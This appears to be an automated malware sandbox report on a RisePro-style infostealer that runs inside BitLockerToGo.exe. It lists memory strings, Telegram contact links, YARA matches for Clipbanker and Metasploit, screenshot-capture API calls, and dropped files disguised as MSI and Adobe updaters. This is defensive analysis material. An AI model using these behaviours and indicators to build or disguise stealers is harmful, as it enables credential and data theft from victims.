Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175
Source: file.exe String found in binary or memory: https://login.chinacloudapi.cn/in
Source: file.exe String found in binary or memory: https://login.microsoftonline.com/illegal
Source: file.exe String found in binary or memory: https://login.microsoftonline.us/indefinite
Source: file.exe String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictin
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.;k
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, 9VicU2EcsIoeWuNiSqblWRg.zip.3.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTNOq
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.3.dr String found in binary or memory: https://t.me/risepro_bot
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: 3b6N2Xdh3CYwplaces.sqlite.3.dr, D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org#
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.6:49707 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE5FF0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown, 3_2_02EE5FF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07E99080 OpenDesktopA,CreateDesktopA, 3_2_07E99080

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.2264717201.000000C000BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.2265171878.000000C000CAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.2265171878.000000C000FD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Abnormal high CPU Usage
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00042E980 0_2_000000C00042E980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00048E990 0_2_000000C00048E990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00053E950 0_2_000000C00053E950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000451A10 0_2_000000C000451A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004A2A10 0_2_000000C0004A2A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F79F0 0_2_000000C0004F79F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F6B30 0_2_000000C0004F6B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000538BB0 0_2_000000C000538BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000453BBF 0_2_000000C000453BBF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000546B60 0_2_000000C000546B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F1C20 0_2_000000C0004F1C20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004E6BE0 0_2_000000C0004E6BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000439D28 0_2_000000C000439D28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F9D30 0_2_000000C0004F9D30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004EEDA0 0_2_000000C0004EEDA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00043BD60 0_2_000000C00043BD60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000545D70 0_2_000000C000545D70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F6D60 0_2_000000C0004F6D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00044CE86 0_2_000000C00044CE86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00051CFB0 0_2_000000C00051CFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004FFFA0 0_2_000000C0004FFFA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000457FB0 0_2_000000C000457FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F7F40 0_2_000000C0004F7F40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000492F60 0_2_000000C000492F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F7000 0_2_000000C0004F7000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000424FC4 0_2_000000C000424FC4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000409090 0_2_000000C000409090
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004EE040 0_2_000000C0004EE040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004EF040 0_2_000000C0004EF040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F7100 0_2_000000C0004F7100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004FA100 0_2_000000C0004FA100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000546120 0_2_000000C000546120
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0005030C0 0_2_000000C0005030C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000534140 0_2_000000C000534140
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004F9170 0_2_000000C0004F9170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00053A220 0_2_000000C00053A220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000458230 0_2_000000C000458230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0005451E0 0_2_000000C0005451E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000513950 0_2_000000C000513950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000439EEF 0_2_000000C000439EEF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E0A2C0 3_2_02E0A2C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F0A2B0 3_2_02F0A2B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EAA200 3_2_02EAA200
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EBE3C0 3_2_02EBE3C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E963B0 3_2_02E963B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC00A0 3_2_02EC00A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4002D 3_2_02E4002D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E986B0 3_2_02E986B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E90600 3_2_02E90600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EB84D0 3_2_02EB84D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EFA480 3_2_02EFA480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDE430 3_2_02EDE430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E845E0 3_2_02E845E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F14550 3_2_02F14550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE4BD0 3_2_02EE4BD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E58BB0 3_2_02E58BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EFA930 3_2_02EFA930
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E9AF60 3_2_02E9AF60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EFAD00 3_2_02EFAD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E9D3A0 3_2_02E9D3A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E9F0D0 3_2_02E9F0D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDF030 3_2_02EDF030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EB1630 3_2_02EB1630
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EB3600 3_2_02EB3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED7600 3_2_02ED7600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E95790 3_2_02E95790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F3F550 3_2_02F3F550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E8BAC8 3_2_02E8BAC8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EADB20 3_2_02EADB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E0B8E0 3_2_02E0B8E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93F40 3_2_02E93F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC1F20 3_2_02EC1F20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E09C90 3_2_02E09C90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E81C10 3_2_02E81C10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F45DE0 3_2_02F45DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF7D00 3_2_02EF7D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F12260 3_2_02F12260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EA6250 3_2_02EA6250
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F083F6 3_2_02F083F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4036F 3_2_02E4036F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EA4320 3_2_02EA4320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF60E0 3_2_02EF60E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F220D0 3_2_02F220D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEE170 3_2_02EEE170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E8611D 3_2_02E8611D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E547BF 3_2_02E547BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF0450 3_2_02EF0450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF85F0 3_2_02EF85F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48A69 3_2_02F48A69
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48A53 3_2_02F48A53
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF8B40 3_2_02EF8B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EA88B0 3_2_02EA88B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48840 3_2_02F48840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF2820 3_2_02EF2820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F489CB 3_2_02F489CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48983 3_2_02F48983
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E3C960 3_2_02E3C960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F46970 3_2_02F46970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E3A928 3_2_02E3A928
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F06EA0 3_2_02F06EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F16EA0 3_2_02F16EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48E26 3_2_02F48E26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F3AE20 3_2_02F3AE20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E58E30 3_2_02E58E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF2FD0 3_2_02EF2FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EECF20 3_2_02EECF20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48C8D 3_2_02F48C8D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEEC40 3_2_02EEEC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48DA7 3_2_02F48DA7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F48D85 3_2_02F48D85
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F34D40 3_2_02F34D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F46D20 3_2_02F46D20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F4923A 3_2_02F4923A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EA9380 3_2_02EA9380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93080 3_2_02E93080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F4901B 3_2_02F4901B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E371A0 3_2_02E371A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F031A0 3_2_02F031A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF6F0 3_2_02ECF6F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EA3610 3_2_02EA3610
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE77E0 3_2_02EE77E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F397B0 3_2_02F397B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F47760 3_2_02F47760
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF7730 3_2_02EF7730
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED1450 3_2_02ED1450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E2F580 3_2_02E2F580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECBAC0 3_2_02ECBAC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4DA86 3_2_02E4DA86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F1DBB0 3_2_02F1DBB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEF9A0 3_2_02EEF9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF7960 3_2_02EF7960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E7B970 3_2_02E7B970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F2DE61 3_2_02F2DE61
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F01FE0 3_2_02F01FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F41FD9 3_2_02F41FD9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F41FB6 3_2_02F41FB6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F03CC0 3_2_02F03CC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEFC40 3_2_02EEFC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF7C00 3_2_02EF7C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EF9D70 3_2_02EF9D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07E9A230 3_2_07E9A230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EBC990 3_2_07EBC990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EBD540 3_2_07EBD540
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EA3B60 3_2_07EA3B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07E99A10 3_2_07E99A10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07EB1980 3_2_07EB1980
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Found potential string decryption / allocating functions
